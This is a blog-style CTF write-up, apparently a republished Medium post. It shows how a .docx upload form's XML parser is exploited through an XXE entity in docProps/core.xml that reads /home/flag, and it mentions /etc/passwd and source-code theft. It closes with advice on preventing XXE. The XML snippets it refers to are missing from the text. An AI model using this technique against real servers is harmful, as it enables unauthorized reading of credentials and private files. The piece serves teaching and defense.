avatarSimon Saliba

Summary

The website content details a method for exploiting a web application's vulnerability using .docx files to gain unauthorized access to restricted server resources.

Abstract

The article discusses a security challenge encountered during the Web Security CTF competition organized by cyber talents.com. The author demonstrates how .docx files, which are essentially structured XML within a zip archive, can be manipulated to execute server-side code and access sensitive information, such as a hidden flag. The exploit involves understanding the .docx file structure, manipulating XML entities, and leveraging an XML External Entities (XXE) vulnerability to read files from outside the web server's root directory. The article emphasizes the danger of XXE vulnerabilities and provides recommendations for preventing such attacks, including using alternative data formats, updating XML processors, disabling external entity processing, and employing security tools like WAFs and IAST.

Opinions

  • The author expresses enthusiasm for sharing web security insights with fellow web development enthusiasts.
  • Initially, the author faced challenges in uploading non-.docx files due to the application's file validation mechanisms.
  • The author highlights the importance of understanding file structures (in this case, .docx) to exploit vulnerabilities effectively.
  • The article suggests that developers often overlook the security risks associated with XML parsing, particularly XXE vulnerabilities.
  • There is an emphasis on the need for developer training to recognize and mitigate XXE attacks.
  • The author advocates for proactive security measures, such as using dependency checkers and keeping libraries up to date.
  • The author implies that the severity of XXE vulnerabilities can lead to full system compromise if not addressed properly.

Using Word Documents or “.docx” files to gain unauthorised access to private server resources

I was happy to compete in the Web Security CTF organised by cybertalents.com between the 19th and the 21st of November 2020. I would love to share some learnings with web development passionates like myself. This article demonstrates how .docx files can be abused to get restricted access to sensitive resources on a server, like passwords or website source codes.

The challenge I will present in this article is called “Notebook”. It is a simple webpage containing a form to upload MSWord documents or “.docx” files to the server. On the right side of the form, the page renders 3 fields : title, subject and description. Under the form, there is a link to an empty “sample.docx” file that we can download. So practically, the user writes his note in a docx file (he can use the sample.docx provided), upload it to the server and sees the Title, Subject and Description of his note printed on the screen. In the server hosting this application, there is a hidden flag that we’ll need to retrieve in order to successfully complete the challenge.

Simple…

To check if there are any additional hidden routes aside from the main page, I made a simple request to /robots.txt that revealed a file named “flag” in the /home/ directory. This hint is telling us that the flag is stored in the previous restricted directory. The challenge became clear, we need to use the upload form to execute code server-side and retrieve the flag from the given restricted directory.

I started by trying to upload .txt, .php and .html files instead of word documents to try to crash the application, but it only allowed .docx files — BAD LUCK! Quick reaction, I decided to dissimulate .php files under .docx extensions. The app was smarter than expected. Apparently, It was checking the file structure to verify documents, and not only extensions. After trying a lot of techniques to trick the server into accepting non-docx files and failing miserably, I came to the conclusion that we need to exploit the server using these MSWord documents.

The next obvious step would be to understand what is a .docx file, and why is it different from other extensions like .doc and .txt? A docx file is an archive (.zip file) that has an XML structure. Unlike .doc and .txt files, if you try to open a .docx file using a text editor, you will find a long stream of hexadecimal characters. The .docx archive contains very specific XML files that are responsible of defining the layout of the document, the font, the metadata, the content (text and photos) and many other properties. In other terms, every docx file is a zip file. However, a zip file is a docx only if it contains the necessary XML elements which are the building blocks of the docx. Let’s try to look closely inside a typical docx file. I choose to look into the sample.docx file provided by the web application: on mac/linux try: — % unzip [/path/to/]sample.docx -d [/path/to/]sample/ — % cd [/path/to/]sample/ — % ls -l A “sample” directory was created where we can see the content of our decompressed docx: /rels/ /customXml/ /docProps/ /word/ [Content_Types].xml

Okay, so let’s get back to our web application. Let’s try to print something on the screen. Remember, at the right side of the form, three fields can be printed: Title, Subject and Description. For example, let’s write a note saying: Title: Lunch Subject: Restaurant Choice Description: I feel like eating a burger today.

How would we go about this? Let’s open sample.docx, write exactly the above, save it and upload it to the server. Nothing shows on the screen. My first instinct was that the server will look for keywords “title, subject and description”, parse the input text accordingly and show the values on the screen. But apparently the page is doing something different: whatever we write inside the docx file using MSWord, nothing will change on the screen. So technically, the webapp wants to get “title, subject and description” from elsewhere INSIDE the docx.

Using a simple text editor, I started to explore the unzipped sample.docx file. After looking at all the xml files inside, I found this code in /docProps/core.xml:

core.xml is a document where Core Properties of sample.docx are defined. We can clearly see the title, subject and description tags! Let’s write our Lunch note text between the corresponding tags and save. We now need to convert our new document back to docx: — % zip -r sample_updated.docx * Uploading the new docx will now print our note to the screen !

The last part of our challenge would be to write the content of /home/flag on the screen instead of the random Lunch note.

/home/ is a restricted directory. This means that we need to traverse illegally from the website directory (by default /var/www/website-name) to the desired /home/flag.

This made me think of XXE or XML External Entities vulnerability which is found in XML parsers.

In XML documents, entities are constants that can be defined at the top of the file and re-used anywhere inside the file, just like constants in any other programming language. We modify core.xml as seen below to include a “title” entity:

&title is referring to “Hello World” in the above.

The usage of XML Entities is dangerous. In some cases, the XML parser is configured to allow Entities to refer to External Resources, like the contents of restricted files. Let’s try to exploit this vulnerability in our case.

The “flag” entity in the above is referring to the content of the /home/flag file. We’re printing it between the tags. If we save the doc, convert back to .docx format and upload to the server, we will see the flag printed on the screen!

This simple example shows how dangerous the XXE vulnerability really is. If we replace “file:///home/flag” by “file:///etc/passwd” we could retrieve all users and passwords stored on the server, or “file:///var/www/[securebank]/[transferfunds.php]”, we can get the website source code.

Moreover, if the “expect” php module is loaded, we might be able to execute random code on the server and compromise the entire system.

How to prevent XXE?

Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

  • Whenever possible, use less complex data formats such as JSON, and avoiding serialization of sensitive data.
  • Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
  • Disable XML external entity and DTD processing in all XML parsers in the application.

Other methods involve the usage of virtual patching, API security gateways, Web Application Firewalls (WAF), or Interactive Application Security Testing (IAST) tools to detect, monitor, and block XXE attacks.

Xxe
Cybersecurity
Web Development
Software Development
Hacking
Recommended from ReadMedium